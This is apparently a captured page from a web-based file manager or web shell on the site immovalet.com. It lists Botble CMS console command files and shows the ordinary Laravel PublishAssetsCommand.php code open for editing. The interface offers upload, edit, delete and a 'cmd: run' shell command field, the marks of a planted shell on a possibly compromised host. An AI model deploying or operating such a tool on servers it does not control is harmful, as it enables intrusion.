/
home
/
techb158
/
immovalet.com
/
vendor
/
botble
/
platform
/
base
/
src
/
Commands
/
/home/techb158/immovalet.com/vendor/botble/platform/base/src/Commands
mkdir
upload
Name
Size
Mode
Actions
ClearLogCommand.php
1108
0644
edit
dl
rm
InstallCommand.php
1231
0644
edit
dl
rm
PublishAssetsCommand.php
805
0644
edit
dl
rm
Edit:
/home/techb158/immovalet.com/vendor/botble/platform/base/src/Commands/PublishAssetsCommand.php
(805B)
<?php namespace Botble\Base\Commands; use Illuminate\Console\Command; class PublishAssetsCommand extends Command { /** * The console command signature. * * @var string */ protected $signature = 'cms:publish:assets'; /** * The console command description. * * @var string */ protected $description = 'Publish assets (CSS, JS, Images...)'; /** * Execute the console command. */ public function handle() { $this->info('Publishing core, packages, plugins assets...'); $this->call('vendor:publish', ['--tag' => 'cms-public', '--force' => true]); $this->info('Publishing theme assets...'); $this->call('cms:theme:assets:publish'); $this->info('Published assets successfully!'); } }
Save
cmd:
run